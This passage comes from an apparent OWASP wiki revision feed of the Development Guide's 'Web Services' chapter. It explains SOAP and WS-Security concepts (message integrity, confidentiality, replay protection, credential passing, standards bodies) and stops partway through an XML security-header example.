For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59467</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59467"/>
				<updated>2009-04-26T11:54:06Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Security header’s structure */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
